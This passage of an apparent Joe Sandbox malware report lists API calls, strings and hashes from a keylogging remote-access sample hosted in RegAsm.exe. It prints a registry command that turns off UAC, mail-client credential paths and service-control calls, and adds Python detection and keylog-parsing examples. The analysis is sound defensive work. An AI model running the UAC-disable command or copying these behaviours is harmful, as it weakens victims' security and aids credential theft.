• Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A

APIs
• Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
  • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
Memory Dump Source
• Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
Similarity
• API ID: H_prologSleep
• String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
• API String ID: 3469354165-3054508432
• Opcode ID: 4647b3a2d276aae203f7a96e08ca0eaa792698452bb0acf0d7caf0005d5321f1
• Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
• Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E

Memory Dump Source
• Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
Similarity
• API ID: __cftoe
• String ID:
• API String ID: 4189289331-0
• Opcode ID: df708042516445aa89903c6330052172adb2df4233c064de01baf1be20d0a2ef
• Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
• Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D

APIs
• _strlen.LIBCMT ref: 10001607
• _strcat.LIBCMT ref: 1000161D
• lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
• lstrcatW.KERNEL32(?,?), ref: 1000165A
• lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
• lstrcatW.KERNEL32(00001008,?), ref: 10001686
Memory Dump Source
• Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
Similarity
• API ID: lstrcatlstrlen$_strcat_strlen
• String ID:
• API String ID: 1922816806-0
• Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
• Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
• Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9

APIs
• lstrcatW.KERNEL32(?,?), ref: 10001038
• lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
• lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
• lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
• GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
Memory Dump Source
• Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
Similarity
• API ID: lstrlen$AttributesFilelstrcat
• String ID:
• API String ID: 3594823470-0
• Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
• Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
• Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50

APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
• OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
• ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
Memory Dump Source
• Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
Similarity
• API ID: Service$CloseHandle$Open$ChangeConfigManager
• String ID:
• API String ID: 493672254-0
• Opcode ID: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
• Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
• Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB

APIs
• GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
• SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
Memory Dump Source
• Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
• Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
• Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300

APIs
• GetLastError.KERNEL32(?,?,10006C6C), ref: 10005AFA
• _free.LIBCMT ref: 10005B2D
• _free.LIBCMT ref: 10005B55
• SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B62
• SetLastError.KERNEL32(00000000,?,?,10006C6C), ref: 10005B6E
• _abort.LIBCMT ref: 10005B74
Memory Dump Source
• Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
• API String ID: 3160817290-0
• Opcode ID: c9cb188a03aa1811073f11ee06fa520bea6a831bfab7ff5292fc2b03e8e202de
• Instruction ID: 6ab9c425fee0725613b21b3b36aaf5e4259b246f4cabca8c388d0d7fb541d563
• Instruction Fuzzy Hash: 8FF0A47A508911AAF212E3346C4AF0F36AACBC55E3F264125F918A619DFF27B9024174

APIs
• GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
• _free.LIBCMT ref: 004482CC
• _free.LIBCMT ref: 004482F4
• SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
• SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
• _abort.LIBCMT ref: 00448313
Memory Dump Source
• Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
• API String ID: 3160817290-0
• Opcode ID: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
• Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
• Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D

APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
• OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
Memory Dump Source
• Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
Similarity
• API ID: Service$CloseHandle$Open$ControlManager
• String ID:
• API String ID: 221034970-0
• Opcode ID: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
• Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
• Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9

APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
• OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
• ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
Memory Dump Source
• Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
Similarity
• API ID: Service$CloseHandle$Open$ControlManager
• String ID:
• API String ID: 221034970-0
• Opcode ID: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
• Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
• Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9

APIs
• OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
• OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
• ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
• CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
Memory Dump Source
• Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
Similarity
• API ID: Service$CloseHandle$Open$ControlManager
• String ID:
• API String ID: 221034970-0
• Opcode ID: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
• Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
• Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9

APIs
  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
  • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
  • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
  • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
• GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
  • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
  • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
Memory Dump Source
• Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
Similarity
• API ID: lstrlen$_strlenlstrcat$AttributesFile
• String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
• API String ID: 4036392271-1520055953
• Opcode ID: 09c536ecd907401b0aa489f333ca62d314ebad464b807bf11bf7235871964734
• Instruction ID: e2b7c7e1c3038021adfe9ab266432482c710e64fc4cfb1bae4cfd9c1521b4980
• Instruction Fuzzy Hash: 4B21D579E142486AFB14D7A0EC92FED7339EF80754F000556F604EB1D5EBB16E818758
                                                APIs
                                                • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                                                • wsprintfW.USER32 ref: 0040B22E
                                                  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: EventLocalTimewsprintf
                                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                • API String ID: 1497725170-248792730
                                                • Opcode ID: e3693a350b1622166f97d02a0b5d86e181ebd5c9cb8161137e773e05ea357f11
                                                • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                                • Opcode Fuzzy Hash: e3693a350b1622166f97d02a0b5d86e181ebd5c9cb8161137e773e05ea357f11
                                                • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
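The wsprintfW call above formats the SYSTEMTIME returned by GetLocalTime into the header the sample writes when its offline keylogger starts. As an added example, not code from the Joe Sandbox report or from the sample, the Python below pulls those headers out of a recovered keylog file and splits it into per-session chunks. It assumes the three string pieces listed under String ID are concatenated in order, giving `[YYYY/MM/DD HH:MM:SS Offline Keylogger Started]`; the log content is constructed. Because the time comes from GetLocalTime, the timestamps are in the victim machine's local time zone, not UTC, which matters when lining them up with C2 traffic.

```python
import re
from datetime import datetime

# Header layout is an assumption reconstructed from the String ID entry
# "[%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]": the three
# pieces are taken to be written back to back by wsprintfW at 0x0040B22E.
HEADER_RE = re.compile(
    r"\[(\d{4})/(\d{2})/(\d{2}) (\d{2}):(\d{2}):(\d{2}) Offline Keylogger Started\]"
)

# Constructed keylog content, not recovered from the sandbox run.
SAMPLE_LOG = (
    "[2024/09/24 08:15:02 Offline Keylogger Started]\r\n"
    "quarterly figures attached\r\n"
    "[2024/09/24 09:40:17 Offline Keylogger Started]\r\n"
    "user@example.com[Tab]hunter2[Enter]\r\n"
)


def parse_sessions(text):
    """Return [(session_start_local_time, captured_text), ...] for each
    keylogger start header found in `text`. Text before the first header
    is ignored; text after a header runs until the next header or EOF."""
    sessions = []
    headers = list(HEADER_RE.finditer(text))
    for i, m in enumerate(headers):
        # Group order matches the %04i/%02i/%02i %02i:%02i:%02i format:
        # year, month, day, hour, minute, second (local time, see lead-in).
        started = datetime(*map(int, m.groups()))
        end = headers[i + 1].start() if i + 1 < len(headers) else len(text)
        sessions.append((started, text[m.end():end].strip()))
    return sessions


def session_count(text):
    """Number of times the keylogger was (re)started in this log."""
    return len(HEADER_RE.findall(text))
```

A session boundary is only as good as the header regex, so if a variant changes the literal text, the capture still lands in the previous session rather than being lost; checking `session_count` against the number of RegAsm.exe starts seen in the timeline is a cheap sanity test.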
                                                APIs
                                                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                • CloseHandle.KERNEL32(00000000), ref: 0040A729
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$CloseCreateHandleSizeSleep
                                                • String ID: XQG
                                                • API String ID: 1958988193-3606453820
                                                • Opcode ID: 3b1a01b47bddebb3752f31eb226f8e532d480515b9e880c3ec3420bf47c2c25d
                                                • Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
                                                • Opcode Fuzzy Hash: 3b1a01b47bddebb3752f31eb226f8e532d480515b9e880c3ec3420bf47c2c25d
                                                • Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ClassCreateErrorLastRegisterWindow
                                                • String ID: 0$MsgWindowClass
                                                • API String ID: 2877667751-2410386613
                                                • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                                • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                                APIs
                                                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                                • CloseHandle.KERNEL32(?), ref: 004077E5
                                                • CloseHandle.KERNEL32(?), ref: 004077EA
                                                Strings
                                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                                • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseHandle$CreateProcess
                                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                • API String ID: 2922976086-4183131282
                                                • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                                • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
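The CreateProcessA call above runs `cmd.exe /k` with a `reg.exe ADD` that sets EnableLUA to 0 under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, which turns UAC off system-wide after the next restart; `/k` keeps the cmd.exe shell alive after reg.exe returns. As an added example, not part of the Joe Sandbox report or of the sample, the following Python is the detection logic a SOC would run over process-creation telemetry for exactly this command line. The Sysmon-style field names (Image, ParentImage, CommandLine), the events themselves and the RegAsm.exe parent check are assumptions made for the example.

```python
import ntpath
import re

# Added example: match the UAC-disable command issued via CreateProcessA at
# 0x004077D6. Field names and sample events are constructed, not sandbox output.

POLICIES_SYSTEM = (
    r"(?:HKLM|HKEY_LOCAL_MACHINE)\\SOFTWARE\\Microsoft\\Windows"
    r"\\CurrentVersion\\Policies\\System"
)

# reg[.exe] ... add ... <Policies\System key> ... /v EnableLUA ... /d 0 (or 0x0)
UAC_DISABLE_RE = re.compile(
    r"\breg(?:\.exe)?\b.*?\badd\b.*?" + POLICIES_SYSTEM
    + r"\b.*?/v\s+EnableLUA\b.*?/d\s+0+(?:x0+)?\b",
    re.IGNORECASE,
)

# cmd.exe /k leaves the shell running after the child command finishes.
CMD_K_RE = re.compile(r"\bcmd(?:\.exe)?\b.*?\s/k\b", re.IGNORECASE)

# Constructed Sysmon-style process-creation events (assumed field names).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "CommandLine": r"C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD "
                    r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System "
                    r"/v EnableLUA /t REG_DWORD /d 0 /f"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"C:\Windows\System32\reg.exe ADD "
                    r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System "
                    r"/v EnableLUA /t REG_DWORD /d 0 /f"},
    # Benign: an admin turning UAC back on.
    {"Image": r"C:\Windows\System32\reg.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion"
                    r"\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f"},
    # Benign: a read-only query of the same value.
    {"Image": r"C:\Windows\System32\reg.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion"
                    r"\Policies\System /v EnableLUA"},
]


def is_uac_disable(command_line):
    """True when the command line writes EnableLUA=0 to the System policy key."""
    return UAC_DISABLE_RE.search(command_line) is not None


def scan_events(events):
    """Return one alert per event whose CommandLine disables UAC. Both the
    cmd.exe launcher and the reg.exe child carry the string, so expect two
    hits per occurrence and correlate on parent/child rather than deduping."""
    alerts = []
    for ev in events:
        cmd = ev.get("CommandLine", "")
        if not is_uac_disable(cmd):
            continue
        parent = ntpath.basename(ev.get("ParentImage", "")).lower()
        alerts.append({
            "image": ev.get("Image", ""),
            "parent": ev.get("ParentImage", ""),
            "via_cmd_k": CMD_K_RE.search(cmd) is not None,
            # RegAsm.exe is a .NET assembly registration tool; it spawning cmd.exe
            # is the hollowed-host pattern this report shows (process 17).
            "parent_is_regasm": parent == "regasm.exe",
        })
    return alerts
```

Matching on the command line rather than on `reg.exe` as the image is deliberate: the same payload can be delivered through `cmd /c`, PowerShell's `Start-Process`, or the `RegSetValueEx` API, so pair this with a registry-value-set rule on the key itself for coverage of the API path.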
                                                Strings
                                                • Rmc-GT4655, xrefs: 00407715
                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076FF
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Rmc-GT4655
                                                • API String ID: 0-325934808
                                                • Opcode ID: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                                                • Opcode Fuzzy Hash: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,0044338B,?,?,0044332B,?), ref: 0044340D
                                                • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
